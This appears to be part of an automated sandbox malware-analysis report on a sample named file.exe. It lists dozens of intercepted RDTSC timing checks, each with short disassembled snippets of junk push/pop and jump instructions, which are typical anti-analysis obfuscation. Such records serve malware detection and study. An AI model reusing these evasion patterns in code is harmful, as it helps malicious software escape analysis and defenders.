                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A96E4 second address: 5A971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F55E4D1D2D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jo 00007F55E4D1D2D6h 0x00000014 jmp 00007F55E4D1D2DDh 0x00000019 pop eax 0x0000001a jmp 00007F55E4D1D2E9h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A971F second address: 5A973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F55E4D05133h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A973C second address: 5A9740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9C8D second address: 5A9C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F55E4D05126h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9C9B second address: 5A9CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9CA0 second address: 5A9CB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F55E4D05126h 0x00000009 jl 00007F55E4D05126h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9CB1 second address: 5A9CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F55E4D1D2D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551335 second address: 551343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jbe 00007F55E4D05126h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551343 second address: 551364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DEh 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F55E4D1D2D6h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551364 second address: 55136E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55136E second address: 551378 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551378 second address: 55137C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AA24F second address: 5AA25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F55E4D1D2D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8B05 second address: 5A8B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF7EF second address: 5AF7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF7F3 second address: 5AF810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F55E4D05137h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF810 second address: 5AF814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF94B second address: 5AF94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF94F second address: 5AF959 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFE2F second address: 5AFE38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B03D5 second address: 5B03E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F55E4D1D2DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B03E3 second address: 5B03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B03E7 second address: 5B03ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B03ED second address: 5B03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B03F3 second address: 5B03F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4DD8 second address: 5B4DDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C7C second address: 5B3C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jmp 00007F55E4D1D2DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C93 second address: 5B3CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3CA4 second address: 5B3CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3CAA second address: 5B3CC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F55E4D0512Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571264 second address: 571268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571268 second address: 57126E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5718B8 second address: 5718BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571B78 second address: 571B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571B81 second address: 571B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571B87 second address: 571B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 jc 00007F55E4D0512Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571B97 second address: 571BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F55E4D1D2D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571BA7 second address: 571BB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5726DD second address: 551335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F55E4D1D2DFh 0x0000000c nop 0x0000000d call dword ptr [ebp+122D2AA7h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F55E4D1D2E4h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4097 second address: 5B409F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B409F second address: 5B40A9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B40A9 second address: 5B40B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jnc 00007F55E4D05126h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B481F second address: 5B482C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F55E4D1D2D8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B482C second address: 5B4838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F55E4D05126h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4974 second address: 5B49AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F55E4D1D2E8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B49AD second address: 5B49DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05132h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F55E4D05128h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F55E4D0512Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B76BD second address: 5B76D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F55E4D1D2D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e js 00007F55E4D1D2D6h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B76D5 second address: 5B76E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F55E4D05126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B76E2 second address: 5B76F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D1D2DAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B76F4 second address: 5B76F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B76F8 second address: 5B7718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B79F3 second address: 5B79F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA130 second address: 5BA15A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F55E4D1D2F4h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA15A second address: 5BA15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BA15E second address: 5BA162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB8BD second address: 5BB8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D05133h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BB8D6 second address: 5BB8DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF344 second address: 5BF351 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF351 second address: 5BF35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF35A second address: 5BF381 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F55E4D05132h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F55E4D0512Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF381 second address: 5BF38B instructions: 0x00000000 rdtsc 0x00000002 js 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C0B12 second address: 5C0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C0B18 second address: 5C0B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6272 second address: 5C6278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525AD9 second address: 525B15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F55E4D1D2DEh 0x0000000c popad 0x0000000d jng 00007F55E4D1D2DCh 0x00000013 js 00007F55E4D1D2D6h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c je 00007F55E4D1D2E3h 0x00000022 jmp 00007F55E4D1D2DDh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525B15 second address: 525B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05133h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F55E4D0512Bh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4FB2 second address: 5C4FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C511F second address: 5C5145 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D05126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F55E4D05135h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5145 second address: 5C515E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D1D2E1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C515E second address: 5C5175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F55E4D05131h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C52E2 second address: 5C52F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F55E4D1D2DEh 0x00000008 jns 00007F55E4D1D2D6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57203B second address: 57203F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5576 second address: 5C557B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9FA7 second address: 5C9FAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9FAD second address: 5C9FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA241 second address: 5CA24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F55E4D0512Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA641 second address: 5CA64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA64A second address: 5CA64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA7BA second address: 5CA7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1F6D second address: 5D1F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05134h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D026C second address: 5D0298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2E7h 0x00000008 jmp 00007F55E4D1D2E0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0562 second address: 5D0593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F55E4D05128h 0x0000000c jmp 00007F55E4D05138h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F55E4D05128h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0593 second address: 5D0598 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0AD6 second address: 5D0AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F55E4D0512Dh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0AEA second address: 5D0AF4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0AF4 second address: 5D0AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0AF9 second address: 5D0B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0B01 second address: 5D0B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F55E4D05126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0B0E second address: 5D0B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1111 second address: 5D111D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F55E4D0512Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D13C0 second address: 5D13E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2E2h 0x00000009 popad 0x0000000a jl 00007F55E4D1D2DCh 0x00000010 jg 00007F55E4D1D2D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D13E7 second address: 5D13F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D198F second address: 5D1996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5B57 second address: 5D5B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5B5B second address: 5D5B88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F55E4D1D2D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f jc 00007F55E4D1D2D6h 0x00000015 jmp 00007F55E4D1D2E4h 0x0000001a pop esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5B88 second address: 5D5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5CDC second address: 5D5CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5CE2 second address: 5D5CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F55E4D0512Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5CF1 second address: 5D5D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DEh 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
